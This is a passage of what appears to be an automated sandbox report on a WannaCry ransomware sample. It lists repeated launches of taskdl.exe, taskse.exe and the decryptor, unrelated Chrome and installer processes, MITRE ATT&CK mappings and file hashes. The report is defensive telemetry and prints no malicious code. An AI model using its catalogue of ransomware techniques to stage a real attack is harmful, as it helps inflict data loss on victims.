  PID:6004
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6024
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3696
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2052
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6004
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5752
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5572
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5548
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5824
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5720
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5868
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5152
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1860
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5628
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6128
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2856
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5948
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:468
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:740
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5892
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6120
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2260
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5984
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1776
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1660
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:244
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3652
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3744
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5240
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5256
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2356
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2380
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5240
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6084
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:232
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4300
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6124
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1424

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004CC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5140

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5552

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\RegisterInstall.TS"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4944

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3140

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4996
- C:\Program Files\Microsoft Office\root\Office16\Winword.exe
  "C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Users\Public\Desktop\@[email protected]"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:1676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffeb7dcc40,0x7fffeb7dcc4c,0x7fffeb7dcc58
  2⤵
  PID:6104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1580,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1704 /prefetch:2
  2⤵
  PID:5516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:3488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:8
  2⤵
  PID:3368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3084 /prefetch:1
  2⤵
  PID:5628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4364,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4340 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4508,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4292 /prefetch:8
  2⤵
  PID:5268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4536,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4612 /prefetch:8
  2⤵
  PID:780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4476 /prefetch:8
  2⤵
  PID:1676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:6048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4592,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:1
  2⤵
  PID:1176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3312,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3392,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:6060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3176,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3680 /prefetch:8
  2⤵
  PID:5564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3432,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3044 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4968,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:1
  2⤵
  PID:5248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3316,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5548,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  PID:2708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5544,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5288,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:5776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5624,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5756,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:5584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4176,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:5956
- C:\Users\Admin\Downloads\Install VALORANT.exe
  "C:\Users\Admin\Downloads\Install VALORANT.exe"
  2⤵
  - Executes dropped EXE
  PID:4688
- - C:\Users\Admin\Downloads\Install VALORANT.exe
    "C:\Users\Admin\Downloads\Install VALORANT.exe" --agent --riotclient-app-port=53952 --riotclient-auth-token=CyAezhI1H-Rid-BQPz46jQ --app-root=C:/Users/Admin/Downloads "--data-root=C:/ProgramData/Riot Games/Metadata" "--update-root=C:/ProgramData/Riot Games/Metadata/Install VALORANT/Update" "--log-root=C:/Users/Admin/AppData/Local/Riot Games/Install VALORANT/Logs" "--user-data-root=C:/Users/Admin/AppData/Local/Riot Games/Install VALORANT" --session-id=b17b5483-4556-3a4c-8bb3-fa2f0210273a
    3⤵
    - Executes dropped EXE
    PID:1400
- - C:\Users\Admin\Downloads\Install VALORANT.exe
    "C:\Users\Admin\Downloads\Install VALORANT.exe" --session-id=b17b5483-4556-3a4c-8bb3-fa2f0210273a --disable-auto-launch
    3⤵
    - Executes dropped EXE
    PID:2372
  - - C:\Users\Admin\Downloads\Install VALORANT.exe
      "C:\Users\Admin\Downloads\Install VALORANT.exe" --agent --riotclient-app-port=54019 --riotclient-auth-token=F-ZjNJ4XNQlzJ12iq3uoiA --app-root=C:/Users/Admin/Downloads "--data-root=C:/ProgramData/Riot Games/Metadata" "--update-root=C:/ProgramData/Riot Games/Metadata/Install VALORANT/Update" "--log-root=C:/Users/Admin/AppData/Local/Riot Games/Install VALORANT/Logs" "--user-data-root=C:/Users/Admin/AppData/Local/Riot Games/Install VALORANT" --session-id=b17b5483-4556-3a4c-8bb3-fa2f0210273a
      4⤵
      Executes dropped EXE
      PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=6400,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=868 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5328,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6552 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6420,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:5696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6708,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6712 /prefetch:8
  2⤵
  PID:1420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6960,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6956 /prefetch:8
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6948,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7096 /prefetch:8
  2⤵
  PID:5164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7240,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7252 /prefetch:8
  2⤵
  PID:2248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7352,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6484 /prefetch:1
  2⤵
  PID:4156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=7296,i,17562912967027296230,12865685036905305067,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:1580

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5704

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39a1855 /state1:0x41c64e6d
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
1KB

MD5
778d55867a64e144a8cd44744ad45878

SHA1
70a828c97c81b51f4b8e2fea7f1217f74cbf767c

SHA256
8b597319afb8caf9f6c1db3c35709a89d97d9e175ee2e67571266a12e1339284

SHA512
b0d20d00917997d0c08f4e8759c8dcb716a32bcfd521063a9553ea9b6dccfe7e90ad3934c9be7c7cb9eb9e342b9ee70926e9bd902e243e2dfc511a6a848e11b8

Download Submit
